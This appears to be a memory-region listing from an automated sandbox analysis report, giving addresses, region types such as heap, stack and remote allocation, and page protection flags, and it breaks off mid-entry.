|
24211A5D000
|
trusted library allocation
|
page read and write
|
||
|
21E27000
|
trusted library allocation
|
page read and write
|
||
|
27D5631C000
|
heap
|
page read and write
|
||
|
7686000
|
heap
|
page read and write
|
||
|
22D81000
|
trusted library allocation
|
page read and write
|
||
|
27D56545000
|
heap
|
page read and write
|
||
|
27D5823B000
|
heap
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
27D586A4000
|
heap
|
page read and write
|
||
|
34AF000
|
unkown
|
page read and write
|
||
|
23DCB000
|
trusted library allocation
|
page read and write
|
||
|
27D58300000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
B80000
|
heap
|
page read and write
|
||
|
7FF7C11D0000
|
trusted library allocation
|
page read and write
|
||
|
27D563DB000
|
heap
|
page read and write
|
||
|
C36000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
23DBE000
|
stack
|
page read and write
|
||
|
4F18000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
2439F000
|
stack
|
page read and write
|
||
|
24B87000
|
trusted library allocation
|
page read and write
|
||
|
2422815F000
|
heap
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
27D58207000
|
heap
|
page read and write
|
||
|
76FE000
|
heap
|
page read and write
|
||
|
27D56308000
|
heap
|
page read and write
|
||
|
4090000
|
remote allocation
|
page execute and read and write
|
||
|
7FF7C1160000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D589E8000
|
heap
|
page read and write
|
||
|
8AB0000
|
trusted library allocation
|
page read and write
|
||
|
27D5822A000
|
heap
|
page read and write
|
||
|
2420FB40000
|
heap
|
page read and write
|
||
|
792E000
|
stack
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
23E83000
|
trusted library allocation
|
page read and write
|
||
|
2420DF30000
|
heap
|
page read and write
|
||
|
21C30000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C10D0000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D58373000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
27D583AC000
|
heap
|
page read and write
|
||
|
27D583C1000
|
heap
|
page read and write
|
||
|
27D563DB000
|
heap
|
page read and write
|
||
|
2420DF7B000
|
heap
|
page read and write
|
||
|
21BEE000
|
stack
|
page read and write
|
||
|
242116AE000
|
trusted library allocation
|
page read and write
|
||
|
23F60000
|
heap
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
8676000
|
heap
|
page read and write
|
||
|
85AE000
|
stack
|
page read and write
|
||
|
27D581F9000
|
heap
|
page read and write
|
||
|
23E3C000
|
stack
|
page read and write
|
||
|
8671000
|
heap
|
page read and write
|
||
|
2420FA40000
|
heap
|
page read and write
|
||
|
27D58B0B000
|
heap
|
page read and write
|
||
|
27D58262000
|
heap
|
page read and write
|
||
|
7FF7C10E0000
|
trusted library allocation
|
page read and write
|
||
|
24B90000
|
trusted library allocation
|
page read and write
|
||
|
23F02000
|
heap
|
page read and write
|
||
|
7FF7C0F46000
|
trusted library allocation
|
page execute and read and write
|
||
|
24431000
|
trusted library allocation
|
page read and write
|
||
|
23DC4000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D586A4000
|
heap
|
page read and write
|
||
|
27D58288000
|
heap
|
page read and write
|
||
|
27D58319000
|
heap
|
page read and write
|
||
|
94C0000
|
direct allocation
|
page execute and read and write
|
||
|
27D583B1000
|
heap
|
page read and write
|
||
|
8BB0000
|
direct allocation
|
page read and write
|
||
|
8C60000
|
direct allocation
|
page read and write
|
||
|
21B3A000
|
stack
|
page read and write
|
||
|
27D5826A000
|
heap
|
page read and write
|
||
|
23FA1000
|
heap
|
page read and write
|
||
|
30EF000
|
stack
|
page read and write
|
||
|
3230000
|
trusted library section
|
page read and write
|
||
|
2E3C000
|
stack
|
page read and write
|
||
|
24211509000
|
trusted library allocation
|
page read and write
|
||
|
27D583B1000
|
heap
|
page read and write
|
||
|
27D58B0B000
|
heap
|
page read and write
|
||
|
27D5824B000
|
heap
|
page read and write
|
||
|
27D581C1000
|
heap
|
page read and write
|
||
|
D10000
|
direct allocation
|
page read and write
|
||
|
32A0000
|
trusted library allocation
|
page read and write
|
||
|
8B80000
|
trusted library allocation
|
page read and write
|
||
|
21C78000
|
trusted library allocation
|
page read and write
|
||
|
27D581F0000
|
heap
|
page read and write
|
||
|
27D58267000
|
heap
|
page read and write
|
||
|
29FBDF10000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
27D58270000
|
heap
|
page read and write
|
||
|
27D56540000
|
heap
|
page read and write
|
||
|
3240000
|
trusted library allocation
|
page read and write
|
||
|
27D584CD000
|
heap
|
page read and write
|
||
|
27D58396000
|
heap
|
page read and write
|
||
|
4CAE000
|
stack
|
page read and write
|
||
|
2442A000
|
trusted library allocation
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D583F1000
|
heap
|
page read and write
|
||
|
27D581FC000
|
heap
|
page read and write
|
||
|
27D583B1000
|
heap
|
page read and write
|
||
|
7640000
|
heap
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
27D58334000
|
heap
|
page read and write
|
||
|
4AAE000
|
stack
|
page read and write
|
||
|
7FF7C1150000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
24432000
|
trusted library allocation
|
page read and write
|
||
|
313F000
|
heap
|
page read and write
|
||
|
5DD1000
|
trusted library allocation
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
2420DF7F000
|
heap
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
24BB0000
|
trusted library allocation
|
page read and write
|
||
|
27D581F1000
|
heap
|
page read and write
|
||
|
84C7000
|
stack
|
page read and write
|
||
|
217FD000
|
stack
|
page read and write
|
||
|
7897000
|
trusted library allocation
|
page read and write
|
||
|
B50000
|
heap
|
page readonly
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
27D58294000
|
heap
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D58B0B000
|
heap
|
page read and write
|
||
|
27D58A1D000
|
heap
|
page read and write
|
||
|
27D58373000
|
heap
|
page read and write
|
||
|
27D563D5000
|
heap
|
page read and write
|
||
|
27D583E6000
|
heap
|
page read and write
|
||
|
24210309000
|
trusted library allocation
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D5820E000
|
heap
|
page read and write
|
||
|
2420FA00000
|
trusted library allocation
|
page read and write
|
||
|
27D5631C000
|
heap
|
page read and write
|
||
|
7E7000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D581FC000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D5630F000
|
heap
|
page read and write
|
||
|
23E8D000
|
trusted library allocation
|
page read and write
|
||
|
24422000
|
trusted library allocation
|
page read and write
|
||
|
738D000
|
stack
|
page read and write
|
||
|
27D562E7000
|
heap
|
page read and write
|
||
|
2190E000
|
stack
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
8610000
|
heap
|
page read and write
|
||
|
27D5822D000
|
heap
|
page read and write
|
||
|
2422836B000
|
heap
|
page read and write
|
||
|
21C50000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D58292000
|
heap
|
page read and write
|
||
|
606C000
|
trusted library allocation
|
page read and write
|
||
|
27D583B1000
|
heap
|
page read and write
|
||
|
2420E022000
|
heap
|
page read and write
|
||
|
D40000
|
direct allocation
|
page read and write
|
||
|
2420F9C0000
|
trusted library allocation
|
page read and write
|
||
|
317B000
|
heap
|
page read and write
|
||
|
27D58332000
|
heap
|
page read and write
|
||
|
242283DE000
|
heap
|
page read and write
|
||
|
2420E1B0000
|
heap
|
page read and write
|
||
|
27D581DA000
|
heap
|
page read and write
|
||
|
8B3E000
|
stack
|
page read and write
|
||
|
8AB08F7000
|
stack
|
page read and write
|
||
|
24211A9D000
|
trusted library allocation
|
page read and write
|
||
|
27D589F4000
|
heap
|
page read and write
|
||
|
BF6000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
24BA0000
|
trusted library allocation
|
page read and write
|
||
|
27D58327000
|
heap
|
page read and write
|
||
|
242283C0000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D583DF000
|
heap
|
page read and write
|
||
|
27D58253000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C10B0000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
71D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
8BE0000
|
direct allocation
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
4BAE000
|
stack
|
page read and write
|
||
|
27D58283000
|
heap
|
page read and write
|
||
|
242280A0000
|
heap
|
page read and write
|
||
|
C3A000
|
heap
|
page read and write
|
||
|
27D5827A000
|
heap
|
page read and write
|
||
|
24BA0000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
218C0000
|
trusted library allocation
|
page read and write
|
||
|
27D58297000
|
heap
|
page read and write
|
||
|
24211A26000
|
trusted library allocation
|
page read and write
|
||
|
23F1D000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
BA6000
|
heap
|
page read and write
|
||
|
A46A0FE000
|
stack
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
3029000
|
heap
|
page read and write
|
||
|
2E78000
|
stack
|
page read and write
|
||
|
27D58321000
|
heap
|
page read and write
|
||
|
8AB067C000
|
stack
|
page read and write
|
||
|
BDD000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
27D583EC000
|
heap
|
page read and write
|
||
|
29FBDF70000
|
heap
|
page read and write
|
||
|
23DF2000
|
trusted library allocation
|
page read and write
|
||
|
27D58A1C000
|
heap
|
page read and write
|
||
|
7FF7C1060000
|
trusted library allocation
|
page read and write
|
||
|
27D57E50000
|
remote allocation
|
page read and write
|
||
|
24423000
|
trusted library allocation
|
page read and write
|
||
|
23DC6000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
B4E000
|
stack
|
page read and write
|
||
|
4C20000
|
heap
|
page execute and read and write
|
||
|
23F60000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
21A50000
|
remote allocation
|
page read and write
|
||
|
74B000
|
trusted library allocation
|
page execute and read and write
|
||
|
21C50000
|
heap
|
page read and write
|
||
|
4C25000
|
heap
|
page execute and read and write
|
||
|
23F1D000
|
heap
|
page read and write
|
||
|
BEF000
|
heap
|
page read and write
|
||
|
747000
|
trusted library allocation
|
page execute and read and write
|
||
|
242100C0000
|
trusted library allocation
|
page read and write
|
||
|
27D5631C000
|
heap
|
page read and write
|
||
|
8AB0AFE000
|
stack
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D58290000
|
heap
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
27D583AC000
|
heap
|
page read and write
|
||
|
C7C000
|
heap
|
page read and write
|
||
|
242100ED000
|
trusted library allocation
|
page read and write
|
||
|
22DE8000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
D50000
|
direct allocation
|
page read and write
|
||
|
242280B2000
|
heap
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
24C10000
|
trusted library allocation
|
page read and write
|
||
|
24BB0000
|
trusted library allocation
|
page read and write
|
||
|
BF6000
|
heap
|
page read and write
|
||
|
27D5631F000
|
heap
|
page read and write
|
||
|
24210EEF000
|
trusted library allocation
|
page read and write
|
||
|
27D581C0000
|
heap
|
page read and write
|
||
|
2421FF3E000
|
trusted library allocation
|
page read and write
|
||
|
5E28000
|
trusted library allocation
|
page read and write
|
||
|
27D581C3000
|
heap
|
page read and write
|
||
|
23E60000
|
trusted library allocation
|
page read and write
|
||
|
27D56309000
|
heap
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
27D58B0B000
|
heap
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
21B50000
|
trusted library allocation
|
page read and write
|
||
|
27D589F8000
|
heap
|
page read and write
|
||
|
27D5828B000
|
heap
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
242104EF000
|
trusted library allocation
|
page read and write
|
||
|
3285000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BC0000
|
direct allocation
|
page read and write
|
||
|
27D581C8000
|
heap
|
page read and write
|
||
|
23F04000
|
heap
|
page read and write
|
||
|
78E0000
|
heap
|
page execute and read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
27D58206000
|
heap
|
page read and write
|
||
|
24ABE000
|
stack
|
page read and write
|
||
|
27D583EE000
|
heap
|
page read and write
|
||
|
27D57E70000
|
heap
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
328E000
|
stack
|
page read and write
|
||
|
4BB0000
|
trusted library allocation
|
page read and write
|
||
|
21D60000
|
trusted library allocation
|
page read and write
|
||
|
23F50000
|
heap
|
page read and write
|
||
|
8686000
|
heap
|
page read and write
|
||
|
27D563DB000
|
heap
|
page read and write
|
||
|
24228234000
|
heap
|
page read and write
|
||
|
23F68000
|
heap
|
page read and write
|
||
|
24D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
8AB17CA000
|
stack
|
page read and write
|
||
|
27D581EE000
|
heap
|
page read and write
|
||
|
21E2B000
|
trusted library allocation
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
730000
|
trusted library allocation
|
page read and write
|
||
|
8AB0BFE000
|
stack
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4217000
|
remote allocation
|
page execute and read and write
|
||
|
84D0000
|
heap
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
27D589D1000
|
heap
|
page read and write
|
||
|
3198000
|
heap
|
page read and write
|
||
|
27D562E0000
|
heap
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
24BBE000
|
stack
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
27D58A1D000
|
heap
|
page read and write
|
||
|
7FF7C10F0000
|
trusted library allocation
|
page read and write
|
||
|
27D58225000
|
heap
|
page read and write
|
||
|
27D5850A000
|
heap
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
2421FC71000
|
trusted library allocation
|
page read and write
|
||
|
27D581E9000
|
heap
|
page read and write
|
||
|
27D589D1000
|
heap
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
C47000
|
heap
|
page read and write
|
||
|
27D58207000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
27D58452000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
311C000
|
heap
|
page read and write
|
||
|
2420DF20000
|
heap
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
8C30000
|
direct allocation
|
page read and write
|
||
|
3269000
|
trusted library allocation
|
page read and write
|
||
|
768C000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
713000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D5830A000
|
heap
|
page read and write
|
||
|
24B90000
|
trusted library allocation
|
page read and write
|
||
|
742000
|
trusted library allocation
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page read and write
|
||
|
24211A2A000
|
trusted library allocation
|
page read and write
|
||
|
8AB01DE000
|
stack
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page read and write
|
||
|
21DC9000
|
trusted library allocation
|
page read and write
|
||
|
659E000
|
stack
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D582B8000
|
heap
|
page read and write
|
||
|
24440000
|
trusted library allocation
|
page read and write
|
||
|
27D5824E000
|
heap
|
page read and write
|
||
|
21D4C000
|
stack
|
page read and write
|
||
|
8BD0000
|
direct allocation
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
21950000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
758E000
|
stack
|
page read and write
|
||
|
27D583C5000
|
heap
|
page read and write
|
||
|
27D5834B000
|
heap
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
27D583AC000
|
heap
|
page read and write
|
||
|
27D583E2000
|
heap
|
page read and write
|
||
|
78BA000
|
trusted library allocation
|
page read and write
|
||
|
2194F000
|
stack
|
page read and write
|
||
|
856D000
|
stack
|
page read and write
|
||
|
8AB05FE000
|
stack
|
page read and write
|
||
|
24211AB1000
|
trusted library allocation
|
page read and write
|
||
|
21C60000
|
heap
|
page execute and read and write
|
||
|
27D58341000
|
heap
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
27D5838C000
|
heap
|
page read and write
|
||
|
27D58A1E000
|
heap
|
page read and write
|
||
|
D20000
|
direct allocation
|
page read and write
|
||
|
242104B4000
|
trusted library allocation
|
page read and write
|
||
|
27D583BE000
|
heap
|
page read and write
|
||
|
27D58A10000
|
heap
|
page read and write
|
||
|
24D60000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E64000
|
trusted library allocation
|
page read and write
|
||
|
21B60000
|
heap
|
page read and write
|
||
|
31A2000
|
heap
|
page read and write
|
||
|
27D58209000
|
heap
|
page read and write
|
||
|
27D58201000
|
heap
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
27D5839A000
|
heap
|
page read and write
|
||
|
24421000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E62000
|
trusted library allocation
|
page read and write
|
||
|
A46A4FC000
|
stack
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
27D589E3000
|
heap
|
page read and write
|
||
|
27D583EE000
|
heap
|
page read and write
|
||
|
7771000
|
heap
|
page read and write
|
||
|
7FF7C10A0000
|
trusted library allocation
|
page read and write
|
||
|
21C40000
|
trusted library allocation
|
page read and write
|
||
|
728D000
|
stack
|
page read and write
|
||
|
27D582B0000
|
heap
|
page read and write
|
||
|
242283D4000
|
heap
|
page read and write
|
||
|
242283ED000
|
heap
|
page read and write
|
||
|
27D58B09000
|
heap
|
page read and write
|
||
|
27D5825F000
|
heap
|
page read and write
|
||
|
7FF7C1180000
|
trusted library allocation
|
page read and write
|
||
|
242100DC000
|
trusted library allocation
|
page read and write
|
||
|
27D5654E000
|
heap
|
page read and write
|
||
|
27D589D8000
|
heap
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
23DC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D563A9000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
27D58278000
|
heap
|
page read and write
|
||
|
D00000
|
direct allocation
|
page read and write
|
||
|
21D70000
|
heap
|
page read and write
|
||
|
27D5838C000
|
heap
|
page read and write
|
||
|
C36000
|
heap
|
page read and write
|
||
|
27D583AC000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C11A0000
|
trusted library allocation
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
7F070000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D583AD000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
21DB5000
|
trusted library allocation
|
page read and write
|
||
|
8AB184B000
|
stack
|
page read and write
|
||
|
23E90000
|
heap
|
page read and write
|
||
|
24A7E000
|
stack
|
page read and write
|
||
|
27D589DE000
|
heap
|
page read and write
|
||
|
27D5839A000
|
heap
|
page read and write
|
||
|
27D582F7000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
4AF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23EBD000
|
heap
|
page read and write
|
||
|
27D581F6000
|
heap
|
page read and write
|
||
|
22DA9000
|
trusted library allocation
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
2420FB60000
|
heap
|
page execute and read and write
|
||
|
24228167000
|
heap
|
page read and write
|
||
|
24430000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1140000
|
trusted library allocation
|
page read and write
|
||
|
4AEE000
|
stack
|
page read and write
|
||
|
27D583E0000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
31C2000
|
heap
|
page read and write
|
||
|
21B40000
|
trusted library allocation
|
page read and write
|
||
|
21E0A000
|
trusted library allocation
|
page read and write
|
||
|
76BF000
|
heap
|
page read and write
|
||
|
7676000
|
heap
|
page read and write
|
||
|
2421FC51000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
24211A03000
|
trusted library allocation
|
page read and write
|
||
|
242100CA000
|
trusted library allocation
|
page read and write
|
||
|
75CE000
|
stack
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
2421FF4D000
|
trusted library allocation
|
page read and write
|
||
|
27D5833D000
|
heap
|
page read and write
|
||
|
27D58272000
|
heap
|
page read and write
|
||
|
219EF000
|
stack
|
page read and write
|
||
|
73CD000
|
stack
|
page read and write
|
||
|
4C17000
|
remote allocation
|
page execute and read and write
|
||
|
27D589E2000
|
heap
|
page read and write
|
||
|
73D0000
|
heap
|
page read and write
|
||
|
7FF7C1090000
|
trusted library allocation
|
page read and write
|
||
|
24211A99000
|
trusted library allocation
|
page read and write
|
||
|
21A8E000
|
stack
|
page read and write
|
||
|
C3A000
|
heap
|
page read and write
|
||
|
8C40000
|
direct allocation
|
page read and write
|
||
|
27D583DF000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
30AE000
|
stack
|
page read and write
|
||
|
24210144000
|
trusted library allocation
|
page read and write
|
||
|
21E37000
|
trusted library allocation
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
27D5838C000
|
heap
|
page read and write
|
||
|
CCD000
|
stack
|
page read and write
|
||
|
BFE000
|
heap
|
page read and write
|
||
|
3254000
|
trusted library allocation
|
page read and write
|
||
|
2420DFC4000
|
heap
|
page read and write
|
||
|
7E5000
|
heap
|
page read and write
|
||
|
2422810A000
|
heap
|
page read and write
|
||
|
5DC1000
|
trusted library allocation
|
page read and write
|
||
|
27D5630E000
|
heap
|
page read and write
|
||
|
21BA8000
|
stack
|
page read and write
|
||
|
21C2E000
|
stack
|
page read and write
|
||
|
27D58300000
|
heap
|
page read and write
|
||
|
27D583AC000
|
heap
|
page read and write
|
||
|
7FF7C10C0000
|
trusted library allocation
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
27D581CC000
|
heap
|
page read and write
|
||
|
24211A2F000
|
trusted library allocation
|
page read and write
|
||
|
8AB0C7B000
|
stack
|
page read and write
|
||
|
4C6E000
|
stack
|
page read and write
|
||
|
24B80000
|
trusted library allocation
|
page read and write
|
||
|
27D5838C000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
7C0000
|
heap
|
page read and write
|
||
|
868A000
|
heap
|
page read and write
|
||
|
27D5847C000
|
heap
|
page read and write
|
||
|
310D000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
24228207000
|
heap
|
page execute and read and write
|
||
|
27D584FD000
|
heap
|
page read and write
|
||
|
8AB0473000
|
stack
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page read and write
|
||
|
27D585D0000
|
heap
|
page read and write
|
||
|
2420E100000
|
heap
|
page read and write
|
||
|
D70000
|
direct allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
2420E1A0000
|
trusted library allocation
|
page read and write
|
||
|
BFB000
|
heap
|
page read and write
|
||
|
27D58341000
|
heap
|
page read and write
|
||
|
B88000
|
heap
|
page read and write
|
||
|
868E000
|
heap
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
FFE66FF000
|
unkown
|
page read and write
|
||
|
7FF7C1030000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A1C000
|
stack
|
page read and write
|
||
|
27D583B1000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
23F5B000
|
heap
|
page read and write
|
||
|
27D58324000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
324E000
|
unkown
|
page read and write
|
||
|
32CB000
|
heap
|
page read and write
|
||
|
899B000
|
stack
|
page read and write
|
||
|
BE8000
|
heap
|
page read and write
|
||
|
D90000
|
direct allocation
|
page read and write
|
||
|
24227C50000
|
heap
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
27D589FD000
|
heap
|
page read and write
|
||
|
750000
|
trusted library allocation
|
page execute and read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
27D58302000
|
heap
|
page read and write
|
||
|
BFC000
|
heap
|
page read and write
|
||
|
325D000
|
trusted library allocation
|
page execute and read and write
|
||
|
C3B000
|
heap
|
page read and write
|
||
|
7FF7C1110000
|
trusted library allocation
|
page read and write
|
||
|
24D4F000
|
stack
|
page read and write
|
||
|
27D581FE000
|
heap
|
page read and write
|
||
|
32B0000
|
heap
|
page readonly
|
||
|
B70000
|
direct allocation
|
page read and write
|
||
|
24A3D000
|
stack
|
page read and write
|
||
|
24D50000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
27D57E50000
|
remote allocation
|
page read and write
|
||
|
8B60000
|
trusted library allocation
|
page execute and read and write
|
||
|
27D58319000
|
heap
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
79ED000
|
stack
|
page read and write
|
||
|
B60000
|
direct allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
24C00000
|
trusted library allocation
|
page read and write
|
||
|
A46A5FB000
|
stack
|
page read and write
|
||
|
27D5839A000
|
heap
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
23F70000
|
heap
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
24BC0000
|
trusted library allocation
|
page read and write
|
||
|
27D582BE000
|
heap
|
page read and write
|
||
|
242100D8000
|
trusted library allocation
|
page read and write
|
||
|
24420000
|
trusted library allocation
|
page read and write
|
||
|
23E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1120000
|
trusted library allocation
|
page read and write
|
||
|
2420DFBD000
|
heap
|
page read and write
|
||
|
27D5654D000
|
heap
|
page read and write
|
||
|
23DED000
|
trusted library allocation
|
page read and write
|
||
|
23F1D000
|
heap
|
page read and write
|
||
|
27D5654B000
|
heap
|
page read and write
|
||
|
27D58A1D000
|
heap
|
page read and write
|
||
|
242100D4000
|
trusted library allocation
|
page read and write
|
||
|
27D563CD000
|
